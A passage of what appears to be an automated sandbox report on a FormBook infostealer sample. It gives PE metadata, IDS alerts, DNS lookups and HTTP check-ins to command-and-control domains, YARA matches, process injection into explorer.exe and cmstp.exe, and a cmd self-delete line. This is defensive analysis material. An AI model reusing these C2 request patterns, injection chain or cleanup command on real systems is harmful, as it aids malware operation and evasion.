                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                    Time Stamp:0x60F723D0 [Tue Jul 20 19:28:16 2021 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:v4.0.30319
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp dword ptr [00402000h]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe36140x4f.text
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe40000x614.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0xe60000xc.reloc
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    .text0x20000xe166c0xe1800False0.634418090008data7.2914561849IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                    .rsrc0xe40000x6140x800False0.3349609375data3.46323748104IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                    .reloc0xe60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                    Resources

                                                    NameRVASizeTypeLanguageCountry
                                                    RT_VERSION0xe40900x384data
                                                    RT_MANIFEST0xe44240x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                    Imports

                                                    DLLImport
                                                    mscoree.dll_CorExeMain

                                                    Version Infos

                                                    DescriptionData
                                                    Translation0x0000 0x04b0
                                                    LegalCopyrightCopyright 2016 - 2021
                                                    Assembly Version1.0.0.0
                                                    InternalNameAppDomainSortingSetupIn.exe
                                                    FileVersion1.0.0.0
                                                    CompanyNameX SAW
                                                    LegalTrademarks
                                                    Comments
                                                    ProductNameFountain Marks
                                                    ProductVersion1.0.0.0
                                                    FileDescriptionFountain Marks
                                                    OriginalFilenameAppDomainSortingSetupIn.exe

                                                    Network Behavior

                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    07/22/21-17:47:50.149557TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.534.102.136.180
                                                    07/22/21-17:47:50.149557TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.534.102.136.180
                                                    07/22/21-17:47:50.149557TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972680192.168.2.534.102.136.180
                                                    07/22/21-17:47:50.288385TCP1201ATTACK-RESPONSES 403 Forbidden804972634.102.136.180192.168.2.5
                                                    07/22/21-17:48:06.107157TCP1201ATTACK-RESPONSES 403 Forbidden804972734.98.99.30192.168.2.5

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 22, 2021 17:47:39.164311886 CEST4972380192.168.2.5163.44.239.73
                                                    Jul 22, 2021 17:47:39.481966972 CEST8049723163.44.239.73192.168.2.5
                                                    Jul 22, 2021 17:47:39.482224941 CEST4972380192.168.2.5163.44.239.73
                                                    Jul 22, 2021 17:47:39.482461929 CEST4972380192.168.2.5163.44.239.73
                                                    Jul 22, 2021 17:47:39.800601006 CEST8049723163.44.239.73192.168.2.5
                                                    Jul 22, 2021 17:47:39.800715923 CEST8049723163.44.239.73192.168.2.5
                                                    Jul 22, 2021 17:47:39.800735950 CEST8049723163.44.239.73192.168.2.5
                                                    Jul 22, 2021 17:47:39.800968885 CEST4972380192.168.2.5163.44.239.73
                                                    Jul 22, 2021 17:47:39.801023960 CEST4972380192.168.2.5163.44.239.73
                                                    Jul 22, 2021 17:47:40.118293047 CEST8049723163.44.239.73192.168.2.5
                                                    Jul 22, 2021 17:47:50.107059002 CEST4972680192.168.2.534.102.136.180
                                                    Jul 22, 2021 17:47:50.149080992 CEST804972634.102.136.180192.168.2.5
                                                    Jul 22, 2021 17:47:50.149339914 CEST4972680192.168.2.534.102.136.180
                                                    Jul 22, 2021 17:47:50.149557114 CEST4972680192.168.2.534.102.136.180
                                                    Jul 22, 2021 17:47:50.193367958 CEST804972634.102.136.180192.168.2.5
                                                    Jul 22, 2021 17:47:50.288384914 CEST804972634.102.136.180192.168.2.5
                                                    Jul 22, 2021 17:47:50.288418055 CEST804972634.102.136.180192.168.2.5
                                                    Jul 22, 2021 17:47:50.288675070 CEST4972680192.168.2.534.102.136.180
                                                    Jul 22, 2021 17:47:50.288744926 CEST4972680192.168.2.534.102.136.180
                                                    Jul 22, 2021 17:47:50.331383944 CEST804972634.102.136.180192.168.2.5

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jul 22, 2021 17:45:49.850018024 CEST5378453192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:49.910000086 CEST53537848.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:50.219664097 CEST6530753192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:50.270731926 CEST53653078.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:50.395271063 CEST6434453192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:50.461853981 CEST53643448.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:50.675064087 CEST6206053192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:50.727366924 CEST53620608.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:50.950014114 CEST6180553192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:51.007399082 CEST53618058.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:51.545614004 CEST5479553192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:51.597451925 CEST53547958.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:52.428497076 CEST4955753192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:52.479204893 CEST53495578.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:53.237514019 CEST6173353192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:53.297477007 CEST53617338.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:53.882070065 CEST6544753192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:53.946152925 CEST53654478.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:54.918730021 CEST5244153192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:54.968203068 CEST53524418.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:56.364378929 CEST6217653192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:56.413455009 CEST53621768.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:57.562658072 CEST5959653192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:57.616513968 CEST53595968.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:58.370687962 CEST6529653192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:58.420124054 CEST53652968.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:45:59.897418976 CEST6318353192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:45:59.973803043 CEST53631838.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:46:08.502530098 CEST6015153192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:46:08.559580088 CEST53601518.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:46:09.519310951 CEST5696953192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:46:09.568866014 CEST53569698.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:46:16.528683901 CEST5516153192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:46:16.595218897 CEST53551618.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:46:25.265443087 CEST5475753192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:46:25.341048002 CEST53547578.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:46:44.178082943 CEST4999253192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:46:44.235502958 CEST53499928.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:46:45.172060966 CEST6007553192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:46:45.224306107 CEST53600758.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:47:01.006870985 CEST5501653192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:47:01.077224970 CEST53550168.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:47:08.428594112 CEST6434553192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:47:08.490626097 CEST53643458.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:47:38.793797016 CEST5712853192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:47:39.143907070 CEST53571288.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:47:44.820239067 CEST5479153192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:47:44.896126986 CEST53547918.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:47:45.667498112 CEST5046353192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:47:45.732367039 CEST53504638.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:47:48.437340021 CEST5039453192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:47:48.513741970 CEST53503948.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:47:49.922609091 CEST5853053192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:47:50.105590105 CEST53585308.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:48:00.395768881 CEST5381353192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:48:00.844969034 CEST53538138.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:48:05.849910021 CEST6373253192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:48:05.915290117 CEST53637328.8.8.8192.168.2.5
                                                    Jul 22, 2021 17:48:11.115890026 CEST5734453192.168.2.58.8.8.8
                                                    Jul 22, 2021 17:48:11.294578075 CEST53573448.8.8.8192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Jul 22, 2021 17:47:38.793797016 CEST192.168.2.58.8.8.80xf498Standard query (0)www.adultpeace.comA (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:47:44.820239067 CEST192.168.2.58.8.8.80xd845Standard query (0)www.buylocalclub.infoA (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:47:49.922609091 CEST192.168.2.58.8.8.80x15c2Standard query (0)www.alfenas.infoA (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:48:00.395768881 CEST192.168.2.58.8.8.80xace2Standard query (0)www.m678.xyzA (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:48:05.849910021 CEST192.168.2.58.8.8.80xb834Standard query (0)www.advancedaccessapplications.comA (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:48:11.115890026 CEST192.168.2.58.8.8.80xd2d2Standard query (0)www.hiddenwholesale.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Jul 22, 2021 17:47:39.143907070 CEST8.8.8.8192.168.2.50xf498No error (0)www.adultpeace.comadultpeace.comCNAME (Canonical name)IN (0x0001)
                                                    Jul 22, 2021 17:47:39.143907070 CEST8.8.8.8192.168.2.50xf498No error (0)adultpeace.com163.44.239.73A (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:47:44.896126986 CEST8.8.8.8192.168.2.50xd845Name error (3)www.buylocalclub.infononenoneA (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:47:50.105590105 CEST8.8.8.8192.168.2.50x15c2No error (0)www.alfenas.infoalfenas.infoCNAME (Canonical name)IN (0x0001)
                                                    Jul 22, 2021 17:47:50.105590105 CEST8.8.8.8192.168.2.50x15c2No error (0)alfenas.info34.102.136.180A (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:48:00.844969034 CEST8.8.8.8192.168.2.50xace2Name error (3)www.m678.xyznonenoneA (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:48:05.915290117 CEST8.8.8.8192.168.2.50xb834No error (0)www.advancedaccessapplications.comadvancedaccessapplications.comCNAME (Canonical name)IN (0x0001)
                                                    Jul 22, 2021 17:48:05.915290117 CEST8.8.8.8192.168.2.50xb834No error (0)advancedaccessapplications.com34.98.99.30A (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:48:11.294578075 CEST8.8.8.8192.168.2.50xd2d2No error (0)www.hiddenwholesale.compixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                                                    Jul 22, 2021 17:48:11.294578075 CEST8.8.8.8192.168.2.50xd2d2No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)
                                                    Jul 22, 2021 17:48:11.294578075 CEST8.8.8.8192.168.2.50xd2d2No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • www.adultpeace.com
                                                    • www.alfenas.info

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.549723163.44.239.7380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jul 22, 2021 17:47:39.482461929 CEST4696OUTGET /p2io/?YdE=9rL05XJhqvsTNT&xJB=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjW HTTP/1.1
                                                    Host: www.adultpeace.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jul 22, 2021 17:47:39.800715923 CEST4697INHTTP/1.1 301 Moved Permanently
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Content-Length: 706
                                                    Date: Thu, 22 Jul 2021 15:47:39 GMT
                                                    Server: LiteSpeed
                                                    Location: https://www.adultpeace.com/p2io/?YdE=9rL05XJhqvsTNT&xJB=4oufm6g5t6Bqg3y0mDBWoA8I6Q2bNaX51tGc9mj7mZf0wZ/j7IpC3Y+it6teibs/QUjW
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 33 30 31 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 62 65 65 6e 20 70 65 72 6d 61 6e 65 6e 74 6c 79 20 6d 6f 76 65 64 2e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.54972634.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Jul 22, 2021 17:47:50.149557114 CEST4717OUTGET /p2io/?YdE=9rL05XJhqvsTNT&xJB=qSqSgno/BG4XQ9RzVLtR5zfvl4qKeuO7jrFeJ6D3vYZW0mQ/jO0gy2XM9tF7BGvyf3dv HTTP/1.1
                                                    Host: www.alfenas.info
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Jul 22, 2021 17:47:50.288384914 CEST4717INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Thu, 22 Jul 2021 15:47:50 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "60f790d8-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:17:45:56
                                                    Start date:22/07/2021
                                                    Path:C:\Users\user\Desktop\QxVf0A9SFT.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Users\user\Desktop\QxVf0A9SFT.exe'
                                                    Imagebase:0xaa0000
                                                    File size:926720 bytes
                                                    MD5 hash:04EA3FCF816B22F98ADF5267204615F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:.Net C# or VB.NET
                                                    Reputation:low

                                                    General

                                                    Start time:17:46:33
                                                    Start date:22/07/2021
                                                    Path:C:\Users\user\Desktop\QxVf0A9SFT.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\QxVf0A9SFT.exe
                                                    Imagebase:0xe40000
                                                    File size:926720 bytes
                                                    MD5 hash:04EA3FCF816B22F98ADF5267204615F0
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.367232255.00000000018D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.366037368.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.366993982.0000000001560000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:low

                                                    General

                                                    Start time:17:46:36
                                                    Start date:22/07/2021
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff693d90000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:17:46:58
                                                    Start date:22/07/2021
                                                    Path:C:\Windows\SysWOW64\cmstp.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cmstp.exe
                                                    Imagebase:0x120000
                                                    File size:82944 bytes
                                                    MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.501654097.0000000002B60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, Author: Joe Security
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.499466554.0000000000960000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                    Reputation:moderate

                                                    General

                                                    Start time:17:47:03
                                                    Start date:22/07/2021
                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:/c del 'C:\Users\user\Desktop\QxVf0A9SFT.exe'
